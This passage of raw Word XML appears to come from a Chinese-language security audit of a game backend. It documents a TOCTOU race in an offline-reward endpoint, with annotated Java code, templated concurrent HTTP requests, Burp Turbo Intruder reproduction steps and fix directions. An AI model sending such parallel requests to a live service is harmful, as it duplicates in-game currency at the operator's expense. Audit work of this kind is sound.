          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（待领取）的离线奖励记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">由于后续的"领取/兑换"流程是按 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status = 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的记录来处理的，重复记录即等价于多倍游戏货币（金币）凭空创造。</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/api/offline/calcAndClaim</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → SignAuthTestFilter      // 签名验证（通过）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → TokenAuthFilter         // Token 验证，userId 注入 request attribute（通过）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → OfflineRewardController.calcAndClaim(userId)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">      → OfflineRewardService.calcAndClaim(userId)   ← 竞态窗口在此</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入口：OfflineRewardController.java</w:t>
              <w:br/>
              <w:t>@PostMapping("/calcAndClaim")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;OfflineRewardDto&gt; calcAndClaim(@CurrentUserId Long userId) {  // ← HTTP 可控入口（userId 来自 Token，不可伪造）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    OfflineRewardDto record = offlineRewardService.calcAndClaim(userId);          // ← 污点传入 Service 层</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(record);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 层核心逻辑：OfflineRewardService.java</w:t>
              <w:br/>
              <w:t>// ⚠️ 方法上无 @Transactional，无任何锁机制</w:t>
              <w:br/>
              <w:t>public OfflineRewardDto calcAndClaim(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ─────────────── 竞态窗口开始 ───────────────</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // [Thread-A 和 Thread-B 同时执行到此处]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;OfflineRewardRecord&gt; offlineRewardRecordList =</w:t>
              <w:br/>
              <w:t xml:space="preserve">        offlineRewardRecordRepository</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .findByUserIdAndStartTimeOrderByCreateTimeDesc(userId, offlineStartTime);  // ← Thread-A 和 Thread-B 均查询到空列表</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    if (!offlineRewardRecordList.isEmpty()) {   // ← Thread-A: isEmpty() = true → 跳过；Thread-B: isEmpty() = true → 跳过</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return transfer(...);                   // ← 两个线程均不走此分支</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ─────────────── 两个线程均越过重复检查 ──────────────</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal baseReward = hashRate.multiply(BigDecimal.valueOf(cappedSeconds)).multiply(getRewardRatio());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal goldCap    = resolveOfflineGoldCap(user.getCurrentLevel());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    baseReward            = applyOfflineGoldCap(baseReward, goldCap);  // ← 奖励金额计算完成（两线程值相同）</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    OfflineRewardRecord record = new OfflineRewardRecord();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setStartTime(offlineStartTime);</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    record.setBaseRewardAmount(baseReward);   // ← 奖励金</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>额写入 record</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setFinalRewardAmount(baseReward);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setStatus(0);                      // ← status=0（待领取）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record = offlineRewardRecordRepository.save(record);  // ← Thread-A 写入第1条；Thread-B 紧随写入第2条</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ─────────────── 竞态窗口结束，DB 中存在两条 status=0 的同期奖励记录 ──────────────</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    return transfer(record, maxHours);</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以下两个请求需</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（并发）发出，可用 Burp Suite Intruder（Turbo Intruder）或 curl 并行执行：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/api/offline/calcAndClaim HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;合法用户 Token&gt;</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前Unix毫秒时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机字符串-请求1&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;按 ParamSortSignUtils 规则计算的签名&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:b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/api/offline/calcAndClaim HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;合法用户 Token&gt;</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前Unix毫秒时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机字符串-请求2，与请求1不同&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;按 ParamSortSignUtils 规则计算的签名&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>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731"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用合法账号登录，获取有效 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Bearer Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；确保账号有至少一条已结束的游戏会话（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserSessionLog.endTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 不为空）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用 Burp Suite Turbo Intruder 或编写脚本，针对同一 Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>发送 2 条（或更多）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/offline/calcAndClaim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求，注意每条请求使用不同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>X-Nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（绕过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignNonceGuard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 nonce 唯一性限制）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="733"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">观察响应——两条请求均返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并携带各自的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>OfflineRewardDto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，且两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>OfflineRewardRecord.id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 不同，说明数据库已写入两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="734"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>预期结果：数据库中存在两条（或多条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>startTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 相同、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status = 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的离线奖励记录，对应相同会话周期的双份（或多份）待领取金币。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>调用后续领取接口（或等待自动处理），两条记录将分别被处理，实现同一离线周期的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>多倍金币领取</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736"/>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（需要有效 Bearer Token + 签名鉴权通过）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="737"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通用户即可；无需任何管理员权限</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修复建议方向（仅标注代码位置，不展开实施细节）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="738"/>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calcAndClaim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法上增加以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为粒度的互斥保护（分布式锁或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional(isolation = SERIALIZABLE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 配合唯一索引），确保"查询不存在 → 写入"的原子性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="739"/>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offline_reward_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(user_id, start_time)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 列组上添加唯一约束，作为数据库层的最后防线，使重复写入以唯一键冲突异常失败，而非静默成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 3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受影响调用链（4 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="740"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>OfflineRewardController.java.calcAndClaim → OfflineRewardService.java.calcAndClaim → OfflineRewardService.java.transfer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="741"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>OfflineRewardController.java.calcAndClaim → OfflineRewardService.java.calcAndClaim → OfflineRewardService.java.getMaxHours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="742"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>OfflineRewardController.java.calcAndClaim → OfflineRewardService.java.calcAndClaim → OfflineRewardService.java.getRewardRatio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>OfflineRewardController.java.calcAndClaim → OfflineRewardService.java.calcAndClaim → OfflineRewardService.java.resolveOfflineGoldCap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audit_m163_577_calcAndClaim_ctrl-path1of6.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m163_582_calcAndClaim_ctrl-path2of6.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m163_588_calcAndClaim_ctrl-path3of6.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m163_596_calcAndClaim_ctrl-path4of6.md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：OfflineRewardService.java#calcAndClaim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_34" w:id="34"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞33：离线收益记录 TOCTOU 竞态——并发请求可创建重复 status=0 奖励记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="74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：离线收益记录"先查后存"竞态（TOCTOU），缺乏事务保护与唯一约束，并发请求可创建多条 status=0 重复奖励记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="74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src/main/java/com/gameBack/mjservice/service/OfflineRewardService.java:calcAndClaim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="74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74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4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：普通已登录用户（需有效 Bearer Token + 请求签名）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="74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calcAndClaim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法执行"查询是否已存在同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId + startTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录 → 不存在则 INSERT"的两步操作，但：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="750"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>方法上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>没有 `@Transactional` 注解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，两步操作不在同一数据库事务内；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="751"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">仅依赖应用层 </w:t>
      </w:r>
      <w:r>
